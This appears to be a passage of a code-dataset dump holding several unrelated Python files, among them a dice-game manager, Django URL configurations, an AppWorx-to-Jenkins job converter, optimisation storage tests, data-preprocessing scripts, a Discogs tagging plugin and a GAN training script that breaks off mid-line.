'yams':\r\n player.score.yams = int(score_value)\r\n total_two += int(score_value)\r\n elif player.score.yams > -1:\r\n total_two += player.score.yams\r\n\r\n player.score.total_two = total_two\r\n player.score.total_all = total_one + total_two\r\n\r\n player.score.put()\r\n player.put()\r\n\r\n def show(self, player_key, new_turn=True):\r\n \"\"\"\r\n \"\"\"\r\n player = Player().get(player_key)\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice1')\r\n query.filter('player =', player)\r\n dice1 = query.get()\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice2')\r\n query.filter('player =', player)\r\n dice2 = query.get()\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice3')\r\n query.filter('player =', player)\r\n dice3 = query.get()\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice4')\r\n query.filter('player =', player)\r\n dice4 = query.get()\r\n #\r\n query = Dice().all()\r\n query.filter('name =', 'dice5')\r\n query.filter('player =', player)\r\n dice5 = query.get()\r\n\r\n player_query = Player.all()\r\n player_query.filter('game =', player.game)\r\n player_query.order('name')\r\n\r\n # set the template for edit\r\n self.template_values['player'] = player\r\n self.template_values['dice1'] = dice1\r\n self.template_values['dice2'] = dice2\r\n self.template_values['dice3'] = dice3\r\n self.template_values['dice4'] = dice4\r\n self.template_values['dice5'] = dice5\r\n self.template_values['new_turn'] = new_turn\r\n self.template_values['player'] = player\r\n self.template_values['score'] = self.get_score(player_key)\r\n self.template_values['players'] = player_query\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'roll.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n\r\n def show_game(self, player_key=None, game_key=None):\r\n \"\"\"\r\n \"\"\"\r\n # init\r\n player = None\r\n # all\r\n player_query = Player.all()\r\n\r\n # filter\r\n if not player_key or player_key == '':\r\n game = Game().get(game_key)\r\n player_query.filter('game =', game)\r\n\r\n if not game_key or game_key == '':\r\n player = Player().get(player_key)\r\n player_query.filter('game =', player.game)\r\n\r\n # order\r\n player_query.order('name')\r\n\r\n if not player:\r\n player = player_query.get()\r\n\r\n # set the template for edit\r\n self.template_values['player'] = player\r\n self.template_values['score'] = self.get_score(player.key())\r\n self.template_values['players'] = player_query\r\n\r\n # find the template\r\n path = os.path.join(os.path.dirname(__file__),\r\n '../templates', 'yams', 'show_game.html')\r\n\r\n # display the contact\r\n return template.render(path, self.template_values)\r\n","sub_path":"GrandMonde/tools/yams_manager.py","file_name":"yams_manager.py","file_ext":"py","file_size_in_byte":27518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159322407","text":"\nfrom django.utils.translation import gettext_lazy as _\n\nfrom horizon import tables\nfrom horizon import workflows\nfrom horizon import exceptions\n\nfrom gutsdashboard.guts_migrations import tables as migrations_tables\nfrom gutsdashboard.guts_migrations import workflow as migration_workflow\nfrom gutsdashboard.api import guts as guts_api\n\n\nclass LaunchMigrationView(workflows.WorkflowView):\n workflow_class = migration_workflow.LaunchMigration\n\n\nclass IndexView(tables.DataTableView):\n table_class = migrations_tables.MigrationsTable\n template_name = \"guts_migrations/index.html\"\n page_title = _(\"Resource Migrations\")\n\n def get_data(self):\n try:\n migrations = guts_api.migrations_list(self.request)\n except Exception:\n migrations = []\n exceptions.handle(self.request,\n _(\"Unable to retrieve migrations.\")\n )\n\n if migrations:\n for migration in migrations:\n if hasattr(migration, 'resource_id'):\n resource = guts_api.resource_get(\n self.request, migration.resource_id\n )\n setattr(migration, 'resource_name', \"%s (%s)\" % (resource.name, resource.type))\n\n if hasattr(migration, 'destination_hypervisor'):\n destination = guts_api.destination_get(\n self.request, migration.destination_hypervisor\n )\n setattr(migration,\n 'destination_hypervisor',\n destination.hypervisor_name\n )\n\n return migrations\n","sub_path":"gutsdashboard/guts_migrations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"144211738","text":"import argparse\nimport jenkins\nfrom exp_to_json import exp_to_json\nfrom lxml import etree as et\n\n\ndef set_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"exp_file\")\n parser.add_argument(\"jenkins_url\")\n parser.add_argument(\"jenkins_username\")\n parser.add_argument(\"jenkins_token\")\n return parser.parse_args()\n\n\ndef initial_project():\n global properties, builders, publishers, buildWrappers\n\n et.SubElement(project, 'description').text = exp_json['so_job_table']['params']['so_job_descr']\n et.SubElement(project, 'actions')\n et.SubElement(project, 'canRoam').text = 'true'\n et.SubElement(project, 'keepDependencies').text = 'false'\n et.SubElement(project, 'disabled').text = 'false'\n et.SubElement(project, 'blockBuildWhenUpstreamBuilding').text = 'false'\n et.SubElement(project, 'concurrentBuild').text = 'false'\n et.SubElement(project, 'scm', attrib={\"class\": \"jenkins.scm.NullSCM\"})\n et.SubElement(project, 'triggers', attrib={\"class\": \"vector\"})\n properties = et.SubElement(project, 'properties')\n\n rebuilds = et.SubElement(\n properties,\n 'com.sonyericsson.rebuild.RebuildSettings',\n plugin='rebuild@1.27'\n )\n et.SubElement(rebuilds, 'autoRebuild').text = 'false'\n et.SubElement(rebuilds, 'rebuildDisabled').text = 'false'\n\n builders = et.SubElement(project, 'builders')\n publishers = et.SubElement(project, 'publishers')\n buildWrappers = et.SubElement(project, 'buildWrappers')\n\n # paramterized job\n if exp_json['so_job_prompts']:\n pdp = et.SubElement(properties, 'hudson.model.ParametersDefinitionProperty')\n pd = et.SubElement(pdp, 'parameterDefinitions')\n for prompt in exp_json['so_job_prompts']:\n spd = et.SubElement(pd, 'hudson.model.StringParameterDefinition')\n et.SubElement(spd, 'name').text = prompt['params']['so_prompt_descr']\n et.SubElement(spd, 'description')\n et.SubElement(spd, 'defaultValue').text = prompt['params']['so_prompt_dflt']\n et.SubElement(spd, 'trim').text = 'false'\n\n\nif __name__ == '__main__':\n args = set_arguments()\n exp_json = exp_to_json(args.exp_file)\n\n # ******************************************************\n # create phases topology\n # ******************************************************\n original = [(job['params']['so_predecessors'], job['so_task_name']) for job in exp_json['so_chain_detail']]\n phases = [[] for _ in range(len(original))]\n while original:\n for job in original:\n so_predecessors, so_task_name = job\n if not so_predecessors:\n phases[0].append(so_task_name)\n original.remove(job)\n elif so_predecessors in phases:\n phases[phases.index(so_predecessors) + 1].append(so_task_name)\n original.remove(job)\n elif len(so_predecessors) > 1:\n for phase in phases:\n if so_predecessors[0] in phase:\n phases[phases.index(phase) + 1].append(so_task_name)\n original.remove(job)\n phases = filter(None, phases)\n\n # ******************************************************\n # AppWorx module (job) to Jenkins free-style job project\n # ******************************************************\n if not exp_json['so_chain_detail']:\n project = et.Element('project')\n initial_project()\n\n # build steps\n # *** only run sqr file for the demo ***\n so_program = exp_json['so_job_table']['params']['so_program']\n if so_program:\n shell = et.SubElement(builders, 'hudson.tasks.Shell')\n et.SubElement(shell, 'command').text = 'sqr {}.sqr'.format(so_program)\n\n # ********************************************************\n # AppWorx chain (process flow) to Jenkins multijob project\n # ********************************************************\n else:\n project = et.Element(\n 'com.tikal.jenkins.plugins.multijob.MultiJobProject',\n plugin='jenkins-multijob-plugin@1.29'\n )\n initial_project()\n\n # build steps\n chain_detail = sorted(exp_json['so_chain_detail'], key=lambda x: x['params']['so_chain_order'])\n for index, jobs in enumerate(phases):\n phase = et.SubElement(builders, 'com.tikal.jenkins.plugins.multijob.MultiJobBuilder')\n et.SubElement(phase, 'phaseName').text = 'Phase {}'.format(index + 1)\n et.SubElement(phase, 'continuationCondition').text = 'ALWAYS'\n et.SubElement(phase, 'executionType').text = 'PARALLEL'\n phase_jobs = et.SubElement(phase, 'phaseJobs')\n\n # jobs in each phase\n for job in jobs:\n phase_job = et.SubElement(phase_jobs, 'com.tikal.jenkins.plugins.multijob.PhaseJobsConfig')\n job_module = filter(lambda x: x['so_task_name'] == job, chain_detail)[0]['params']['so_module']\n et.SubElement(phase_job, 'jobName').text = job_module\n et.SubElement(phase_job, 'currParams').text = 'true'\n et.SubElement(phase_job, 'aggregatedTestResults').text = 'false'\n et.SubElement(phase_job, 'exposedSCM').text = 'false'\n et.SubElement(phase_job, 'disableJob').text = 'false'\n et.SubElement(phase_job, 'parsingRulesPath')\n et.SubElement(phase_job, 'maxRetries').text = '0'\n et.SubElement(phase_job, 'enableRetryStrategy').text = 'false'\n et.SubElement(phase_job, 'enableCondition').text = 'false'\n et.SubElement(phase_job, 'abortAllJob').text = 'true'\n et.SubElement(phase_job, 'config', attrib={\"class\": \"empty-list\"})\n et.SubElement(phase_job, 'killPhaseOnJobResultCondition').text = 'FAILURE'\n et.SubElement(phase_job, 'buildOnlyIfSCMChanges').text = 'false'\n et.SubElement(phase_job, 'applyConditionOnlyIfNoSCMChanges').text = 'false'\n\n if job in exp_json['so_object_cond']:\n\n # *** only create condition text for the demo ***\n condition_text = []\n conditions = exp_json['so_object_cond'][job]['conditions']\n for condition in conditions:\n so_condition_1 = condition['so_condition_1']\n so_qualifier = condition['so_qualifier']\n so_condition_2 = condition['so_condition_2']\n sub_condition = '({} {} {})'.format(so_condition_1, so_qualifier, so_condition_2)\n condition_text.append(sub_condition)\n\n et.SubElement(phase_job, 'enableCondition').text = 'true'\n et.SubElement(phase_job, 'condition').text = ' && '.join(condition_text)\n else:\n et.SubElement(phase_job, 'condition')\n\n # export Jenkins config file\n jenkins_job_config = et.tostring(\n project,\n xml_declaration=True,\n encoding='UTF-8',\n pretty_print=True\n )\n\n print(jenkins_job_config)\n\n # *********************************\n # import config directly to Jenkins\n # *********************************\n server = jenkins.Jenkins(\n args.jenkins_url,\n username=args.jenkins_username,\n password=args.jenkins_token\n )\n server.create_job(exp_json['so_job_table']['so_module'], jenkins_job_config)\n","sub_path":"appworx_jenkins_converter.py","file_name":"appworx_jenkins_converter.py","file_ext":"py","file_size_in_byte":7516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64704129","text":"import RoboPiLib as RPL\nimport sys,tty,termios,signal,setup,time\n\nrace_mode = False\nfd = sys.stdin.fileno()\nold_settings = termios.tcgetattr(fd)\nglobal initial\ninitial = True\n\ndef interrupted(signum, frame):\n global initial\n initial = True\n move(0)\n turn(1420)\n\ndef stop():\n global initial\n initial = True\n move(0)\n print(\"Deus Halt\")\n\ndef move(speed):\n global initial\n if speed == 0 or speed == 1500:\n RPL.servoWrite(2,0)\n else:\n RPL.servoWrite(2,speed)\n\ndef turn(direction):\n #1000 = left\n #1420 = straight\n #2000 = right\n RPL.servoWrite(1,direction)\n\n\n\nsignal.signal(signal.SIGALRM, interrupted)\ntty.setraw(sys.stdin.fileno())\nprint(\"Press 1 to quit\")\nwhile True:\n DELAY = 0.5\n #key press delay is 0.5 seconds\n signal.setitimer(signal.ITIMER_REAL,DELAY)\n ch = sys.stdin.read(1)\n signal.setitimer(signal.ITIMER_REAL,0)\n if ch == '1':\n stop()\n termios.tcsetattr(fd,termios.TCSADRAIN, old_settings)\n break\n elif ch == ' ':\n stop()\n elif ch == 'w':\n move(2000)\n elif ch == 's':\n move(1000)\n elif ch == 'a':\n turn(1000)\n elif ch == 'd':\n turn(2000)\n elif ch == 'q':\n turn(1260)\n elif ch == 'e':\n turn(1560)\n\n\n elif ch == 'r':\n if race_mode:\n print(\"Cruise\")\n race_mode = False\n else:\n print(\"Race mode activated\")\n race_mode = True\n","sub_path":"r34.py","file_name":"r34.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"624303381","text":"from django.conf.urls import url\nfrom django.views.generic.base import RedirectView\n\nfrom .views import about, browse, article_history, diffview, diffview2, json_view, RequestLogListView, SearchView, SimilarArticleListView\n\nurlpatterns = [\n url(r'^diff/(?P<vid1>\\d+)/(?P<vid2>\\d+)/(?P<urlarg>.*)$', diffview, name='diffview'),\n url(r'^diff2/(?P<vid1>\\d+)/(?P<vid2>\\d+)/$', diffview2, name='diffview2'),\n url(r'^about/$', about, name='about'),\n url(r'^request-log/list/$', RequestLogListView.as_view(), name='requestlog_list'),\n url(r'^browse/$', browse, name='browse'),\n url(r'^browse/(?P<source>.*)$', browse, name='browse'),\n url(r'^similararticle/list/$', SimilarArticleListView.as_view(), name='similararticle_list'),\n url(r'^search/$', SearchView.as_view(), name='search'),\n url(r'^article-history/$', article_history, name='article_history'),\n url(r'^article-history/(?P<urlarg>.*)$', article_history, name='article_history'),\n url(r'^json/view/(?P<vid>\\d+)/?$', json_view),\n url(r'^$', RedirectView.as_view(url='/browse/', permanent=False), name='root'),\n]\n","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"444001055","text":"import json\nimport sys\n\nimport numpy as np\nimport pytest\nfrom attrs import fields\nfrom ax import Experiment, Objective, OptimizationConfig\nfrom ax.storage.json_store.decoder import object_from_json\nfrom ax.storage.json_store.encoder import object_to_json\nfrom ax.storage.json_store.registry import (\n CORE_CLASS_DECODER_REGISTRY,\n CORE_CLASS_ENCODER_REGISTRY,\n CORE_DECODER_REGISTRY,\n CORE_ENCODER_REGISTRY,\n)\n\nimport boa.__main__ as dunder_main\nfrom boa import (\n ModularMetric,\n WrappedJobRunner,\n cd_and_cd_back,\n get_dictionary_from_callable,\n get_scheduler,\n instantiate_search_space_from_json,\n scheduler_from_json_file,\n scheduler_to_json_file,\n split_shell_command,\n)\nfrom boa.__version__ import __version__\nfrom boa.definitions import ROOT\n\nTEST_DIR = ROOT / \"tests\"\n\n\ndef test_save_load_config(\n generic_config,\n synth_config,\n metric_config,\n gen_strat1_config,\n soo_config,\n moo_config,\n pass_through_config,\n scripts_moo,\n scripts_synth_func,\n):\n for config in [\n generic_config,\n synth_config,\n metric_config,\n gen_strat1_config,\n soo_config,\n moo_config,\n pass_through_config,\n scripts_moo,\n scripts_synth_func,\n ]:\n serialized = object_to_json(\n config,\n encoder_registry=CORE_ENCODER_REGISTRY,\n class_encoder_registry=CORE_CLASS_ENCODER_REGISTRY,\n )\n\n c = object_from_json(\n serialized,\n decoder_registry=CORE_DECODER_REGISTRY,\n class_decoder_registry=CORE_CLASS_DECODER_REGISTRY,\n )\n assert config == c\n\n\ndef test_save_load_scheduler_branin(branin_main_run, tmp_path):\n file_out = tmp_path / \"scheduler.json\"\n scheduler = branin_main_run\n scheduler_to_json_file(scheduler, file_out)\n\n pre_num_trials = len(scheduler.experiment.trials)\n\n scheduler = scheduler_from_json_file(file_out)\n scheduler.run_n_trials(5)\n\n post_num_trials = len(scheduler.experiment.trials)\n\n # assert some trials run, even if we hit max trials and not all specified trials were run\n assert post_num_trials > pre_num_trials\n\n\ndef test_can_pass_custom_wrapper_path_when_loading_scheduler(branin_main_run, tmp_path):\n file_out = tmp_path / \"scheduler.json\"\n scheduler = branin_main_run\n\n orig_wrapper_path = scheduler.experiment.runner.wrapper._path\n scheduler.experiment.runner.wrapper._path = \"SOME/OTHER/PATH\"\n\n scheduler_to_json_file(scheduler, file_out)\n\n pre_num_trials = len(scheduler.experiment.trials)\n\n scheduler = scheduler_from_json_file(file_out, wrapper_path=orig_wrapper_path)\n scheduler.run_n_trials(5)\n\n post_num_trials = len(scheduler.experiment.trials)\n\n # assert some trials run, even if we hit max trials and not all specified trials were run\n assert post_num_trials > pre_num_trials\n\n\ndef test_can_pass_custom_wrapper_path_when_loading_scheduler_from_cli(stand_alone_opt_package_run, tmp_path_factory):\n scheduler = stand_alone_opt_package_run\n\n temp_dir = tmp_path_factory.mktemp(\"temp_dir\")\n file_out = temp_dir / \"scheduler.json\"\n\n orig_wrapper_path = scheduler.experiment.runner.wrapper._path\n scheduler.experiment.runner.wrapper._path = \"SOME/OTHER/PATH\"\n\n scheduler_to_json_file(scheduler, file_out)\n\n pre_num_trials = len(scheduler.experiment.trials)\n\n scheduler = dunder_main.main(\n split_shell_command(f\"--scheduler-path {file_out} --wrapper-path {orig_wrapper_path} -td\"),\n standalone_mode=False,\n )\n\n scheduler.run_n_trials(5)\n\n post_num_trials = len(scheduler.experiment.trials)\n\n # assert some trials run, even if we hit max trials and not all specified trials were run\n assert post_num_trials > pre_num_trials\n\n\ndef test_boa_version_in_scheduler(stand_alone_opt_package_run, tmp_path_factory):\n scheduler = stand_alone_opt_package_run\n\n temp_dir = tmp_path_factory.mktemp(\"temp_dir\")\n file_out = temp_dir / \"scheduler.json\"\n\n scheduler_to_json_file(scheduler, file_out)\n with open(file_out, \"r\") as f:\n scheduler_json = json.load(f)\n\n assert \"boa_version\" in scheduler_json\n assert scheduler_json[\"boa_version\"] == __version__\n\n\n@pytest.mark.skip(reason=\"Scheduler can't be saved with generic callable yet\")\ndef test_save_load_scheduler_with_generic_callable(metric_config, tmp_path):\n p = (ROOT / \"tests/scripts/stand_alone_opt_package\").resolve()\n sys.path.append(p)\n\n from tests.scripts.stand_alone_opt_package.wrapper import Wrapper\n\n with cd_and_cd_back(p):\n scheduler_json = tmp_path / \"scheduler.json\"\n config = metric_config\n opt_options = config[\"optimization_options\"]\n\n wrapper = Wrapper()\n wrapper.config = config\n wrapper.mk_experiment_dir(experiment_dir=tmp_path, append_timestamp=False)\n\n runner = WrappedJobRunner(wrapper=wrapper)\n search_space = instantiate_search_space_from_json(config.get(\"parameters\"), config.get(\"parameter_constraints\"))\n\n optimization_config = OptimizationConfig(Objective(ModularMetric(metric_to_eval=np.median), minimize=True))\n\n experiment = Experiment(\n search_space=search_space,\n optimization_config=optimization_config,\n runner=runner,\n **get_dictionary_from_callable(Experiment.__init__, opt_options[\"experiment\"]),\n )\n scheduler = get_scheduler(experiment=experiment, config=config)\n\n assert \"median\" in scheduler.experiment.metrics\n\n scheduler_to_json_file(scheduler, scheduler_json)\n\n scheduler = scheduler_from_json_file(scheduler_json, wrapper=wrapper)\n\n assert \"median\" in scheduler.experiment.metrics\n","sub_path":"tests/integration_tests/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48248035","text":"'''Contains functions to clean/pre-process the data'''\n\nimport numpy as np \nimport pandas as pd \n\n\nvariablesOfInterest = ['AGE','AJCC METASTASIS PATHOLOGIC PM','AJCC NODES PATHOLOGIC PN','AJCC PATHOLOGIC TUMOR STAGE','AJCC TUMOR PATHOLOGIC PT','ETHNICITY','GENDER','INITIAL WEIGHT','Mutation Count','DFS STATUS']\n\n\ndef convert_categorical_to_int(df, column_name):\n\t'''Convert categorical values into integers'''\t\n\n\tcategorical_values = df[column_name].value_counts().index.tolist()\n\tassigned_value = 0\n\tfor value in categorical_values:\n\t\tdf.loc[df[column_name] == value, column_name] = assigned_value\n\t\tassigned_value += 1\n\n\treturn df\n\ndef handle_categorical_variables(df, list_of_columns):\n\t'''Converts the categorical variables in the list of columns to integers'''\n\n\tfor column in list_of_columns:\n\t\tdf = convert_categorical_to_int(df, column)\n\n\treturn df\n\ndef handle_na(df, ):\n\t'''Handle the NaN fields'''\n\n\tdf['AGE'].fillna(df['AGE'].mean, inplace = True)\n\tdf['AJCC METASTASIS PATHOLOGIC PM'].fillna(df['AJCC METASTASIS PATHOLOGIC PM'].value_counts()[0], inplace = True)\n\tdf['AJCC NODES PATHOLOGIC PN'].fillna(df['AJCC NODES PATHOLOGIC PN'].value_counts()[0], inplace = True)\n\tdf['AJCC PATHOLOGIC TUMOR STAGE'].fillna(df['AJCC PATHOLOGIC TUMOR STAGE'].value_counts()[0], inplace = True)\n\tdf['AJCC TUMOR PATHOLOGIC PT'].fillna(df['AJCC TUMOR PATHOLOGIC PT'].value_counts()[0], inplace = True)\n\tdf['DFS STATUS'].fillna(df['DFS STATUS'].value_counts()[0], inplace = True)\n\tdf['ETHNICITY'].fillna(df['ETHNICITY'].value_counts()[0], inplace = True)\n\tdf['GENDER'].fillna(df['GENDER'].value_counts()[0], inplace = True)\n\tdf['INITIAL WEIGHT'].fillna(df['INITIAL WEIGHT'].mean, inplace = True)\n\tdf['Mutation Count'].fillna(df['Mutation Count'].mean, inplace = True)\n\n\treturn df \n\ndef setup_target_variable(df, target_column, new_column, threshold):\n\t'''Changes the target variable values based on the threshold'''\n\n\tdf.loc[df[target_column].values > threshold, new_column] = 1\t\t# 1 - above the threshold\n\tdf.loc[df[target_column].values <= threshold, new_column] = 0\t\t# 0 - below the threshold\n\n\treturn df \n\n\n\n\n\n","sub_path":"Cancer/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"614630829","text":"'''\nEduard Larrañaga\nComputational Astrophysics \n2020\n\nGauss Elimination\n'''\ndef GaussElim(A,b):\n '''\n ------------------------------------------\n GaussElim(A,b)\n ------------------------------------------\n Returns an upper-diagonal Linear System\n the solution fo the Linear System\n A x = b\n where\n A: nxn upper diagonal matrix\n b: n vector\n \n Arguments:\n A: upper-diagonal numpy array of size nxn\n b: numpy array of size n\n ------------------------------------------\n '''\n n = len(b)\n # Check that the pivots are not zero\n for k in range(n):\n if(A[k,k]==0):\n print(f'Pivot A[{k+1:d}, {k+1:d}] is zero')\n return None, None\n \n # Main Loop of the Gauss Elimination\n for i in range(n-1):\n for j in range(i+1,n):\n C=A[j,i]/A[i,i]\n for k in range(n):\n A[j,k] = A[j,k] - A[i,k]*C\n b[j] = b[j] - C*b[i]\n return A, b","sub_path":"17. LSEs/GaussElimination.py","file_name":"GaussElimination.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444854739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 14 18:28:51 2017\n\n@author: Dell\n\"\"\"\nimport numpy as np\n#import pandas as pd\nimport fcs_reader as fcsrd\nimport glob\n\n\nfname = glob.glob('F:\\\\cytowork\\\\experiment_44185_files\\\\*.fcs')[0:18*5]\nfor i in range(len(fname)):\n if i == 0:\n \n meta, data_numpy = fcsrd.parse_fcs(fname[i], meta_data_only=False, output_format='ndarray', reformat_meta=True)\n \n meta_data = meta['_channels_'] \n channel_names = (meta_data['$PnS'].values)\n selected_index = [] \n for name in channel_names:\n if \"CD\" in name:\n selected_index.insert(0,name) \n selected_index.insert(0,\"HLA-DR\")\n selected_index = np.array(selected_index)\n \n surface_marker = meta_data[meta_data['$PnS'].isin(selected_index)] \n surface_marker_data = data_numpy[:,surface_marker.index - 1]\n \n \n else:\n meta, data_numpy = fcsrd.parse_fcs(fname[i], meta_data_only=False, output_format='ndarray', reformat_meta=True) \n surface_marker_data = np.vstack((surface_marker_data,data_numpy[:,surface_marker.index - 1])) \n \n \n \n\n \nsuface_marker_data_transformed = np.arcsinh(surface_marker_data/5)\nquantile_995 = np.percentile(suface_marker_data_transformed,99.5,axis=0)\nsuface_marker_data_normalized = np.divide(suface_marker_data_transformed,np.tile(np.transpose(quantile_995),(np.shape(suface_marker_data_transformed)[0],1)))\n\nnp.save(\"normalizer.npy\",quantile_995)","sub_path":"cal_normalizer.py","file_name":"cal_normalizer.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135094319","text":"#from django.conf.urls.defaults import *\nfrom django.conf.urls import patterns, include, url\nurlpatterns = patterns('message.views', \n# url(r'^delete/(?P<mess_id>\\d+)/+$', 'delete_mess', name = 'message.delete_mess'),\n url(r'^edit/(?P<mess_id>\\d+)/+$', 'edit_mess', name = 'message.edit_mess'),\n url(r'^newmess/(?P<src_name>\\w+)/(?P<src_id>\\d+)/+$', 'newmessage', name = 'message.newmessage'),\n url(r'^questions/$', 'questions', name = 'message.questions'),\n url(r'^newquest/$', 'newquest', name = 'message.newquest'),\n url(r'^response/(?P<mess_id>\\d+)/+$', 'response', name = 'message.response'),\n )","sub_path":"message/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"633733590","text":"\"\"\"Adds Discogs album search support to the\nautotagger. Requires the discogs-client library.\n\"\"\"\nimport string\n\nfrom time import strptime\n\nfrom beetsplug.abstract_search import AbstractSearchPlugin\nfrom beets.autotag import hooks\n\nimport discogs_client\nfrom discogs_client import Artist, Release, Search, DiscogsAPIError\n\ndiscogs_client.user_agent = 'curl/7.28.0'\n\n# Plugin structure and autotagging logic.\n\nclass DiscogsPlugin(AbstractSearchPlugin):\n def __init__(self):\n super(DiscogsPlugin, self).__init__()\n\n def _search(self, artist, album):\n super(DiscogsPlugin, self)._search(artist, album)\n try:\n albums = Search(artist + ' ' + album).results()[0:5]\n return filter(lambda album: isinstance(album, Release), albums)\n except DiscogsAPIError as e:\n if str(e).startswith('404'):\n return []\n else:\n raise e\n\n def _album_info(self, album):\n return hooks.AlbumInfo(\n album.title,\n None,\n self._artists_names(album.artists),\n None,\n map(self._track_info, album.tracklist)\n )\n\n def _track_info(self, track):\n disk_number, position = self._position(track['position'])\n\n return hooks.TrackInfo(\n track['title'],\n None,\n self._artists_names(track['artists']),\n None,\n self._duration(track['duration']),\n position,\n disk_number\n )\n\n def _artists_names(self, artists):\n filtered = filter(lambda artist: isinstance(artist, Artist), artists)\n names = map(lambda artist: artist.name, filtered)\n\n return ' and '.join(names)\n\n def _position(self, position):\n try:\n original = position\n \"\"\"Convert track position from u'1', u'2' or u'A', u'B' to 1, 2 etc\"\"\"\n position = position.encode('ascii').lower() # Convert from unicode to lovercase ascii\n\n if not len(position):\n return 0, 0\n\n first = position[0]\n\n if string.ascii_lowercase.find(first) != -1:\n number = ord(first) - 96\n\n if len(position) == 1:\n replace = '%i' % number # Letter is track number\n else:\n replace = '%i-' % number # Letter is vinyl side\n\n position = position.replace(first, replace)\n\n if position.find('-') == -1:\n position = '1-' + position # If no disk number, set to 1\n\n result = map(int, position.split('-'))\n\n if len(result) == 2:\n return result\n else:\n return 0, 0\n except ValueError:\n return 0, 0\n\n def _duration(self, duration):\n try:\n duration = strptime(duration.encode('ascii'), '%M:%S')\n except ValueError:\n return 0\n else:\n return duration.tm_min * 60 + duration.tm_sec","sub_path":"beetsplug/discogs.py","file_name":"discogs.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"154154221","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nimport itertools\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nfrom tensorflow.python.lib.io import file_io\nimport argparse\n\n# In[2]:\n\n\ndef generator(z, isTraining=True):\n with tf.variable_scope('generator'):\n \n gz1=tf.layers.conv2d_transpose(inputs=z,filters=64, kernel_size=[4,4], strides=(1,1), padding='valid')\n ga1= tf.nn.relu(tf.layers.batch_normalization(gz1, training=isTraining))\n gz2=tf.layers.conv2d_transpose(inputs=ga1,filters=64, kernel_size=[4,4], strides=(2,2), padding='same')\n ga2= tf.nn.relu(tf.layers.batch_normalization(gz2, training=isTraining))\n gz3=tf.layers.conv2d_transpose(inputs=ga2,filters=32, kernel_size=[4,4], strides=(2,2), padding='same')\n ga3= tf.nn.relu(tf.layers.batch_normalization(gz3, training=isTraining))\n gz4=tf.layers.conv2d_transpose(inputs=ga3,filters=32, kernel_size=[4,4], strides=(2,2), padding='same')\n ga4= tf.nn.relu(tf.layers.batch_normalization(gz4, training=isTraining))\n gz5=tf.layers.conv2d_transpose(inputs=ga4,filters=1, kernel_size=[4,4], strides=(2,2), padding='same')\n ga5=tf.nn.tanh(gz5)\n output= ga5\n return output\n\n\n# In[3]:\n\n\ndef discriminator(x, isTraining=True, reuse=False):\n with tf.variable_scope('discriminator', reuse=reuse):\n \n dz1=tf.layers.conv2d(inputs=x,filters=16, kernel_size=[4,4], strides=(2,2), padding='same')\n da1= tf.nn.leaky_relu(dz1,.2)\n dz2=tf.layers.conv2d(inputs=da1,filters=32, kernel_size=[4,4], strides=(2,2), padding='same')\n da2= tf.nn.leaky_relu(tf.layers.batch_normalization(dz2, training=isTraining),.2)\n dz3=tf.layers.conv2d(inputs=da2,filters=64, kernel_size=[4,4], strides=(2,2), padding='same')\n da3= tf.nn.leaky_relu(tf.layers.batch_normalization(dz3, training=isTraining),.2)\n dz4=tf.layers.conv2d(inputs=da3,filters=64, kernel_size=[4,4], strides=(2,2), padding='same')\n da4= tf.nn.leaky_relu(tf.layers.batch_normalization(dz4, training=isTraining),.2)\n dz5=tf.layers.conv2d(inputs=da4,filters=1, kernel_size=[4,4], strides=(1,1), padding='valid')\n da5=tf.nn.sigmoid(dz5)\n output=da5\n return output, dz5\n \n\n\n\n\n# In[5]:\ndef main(job_dir,**args):\n\n with tf.device('/device:GPU:0'):\n batch_size = 100\n lr = 0.0002\n epochs = 10\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True, reshape=[])\n x = tf.placeholder(tf.float32, shape=(None, 64, 64, 1))\n z = tf.placeholder(tf.float32, shape=(None, 1, 1, 100))\n isTraining = tf.placeholder(dtype=tf.bool)\n G_z=generator(z, isTraining)\n realD, real_logits=discriminator(x,isTraining)\n fakeD, fake_logits=discriminator(G_z,isTraining, True)\n D_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=real_logits, labels=tf.ones([batch_size, 1, 1, 1])))\n D_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=fake_logits, 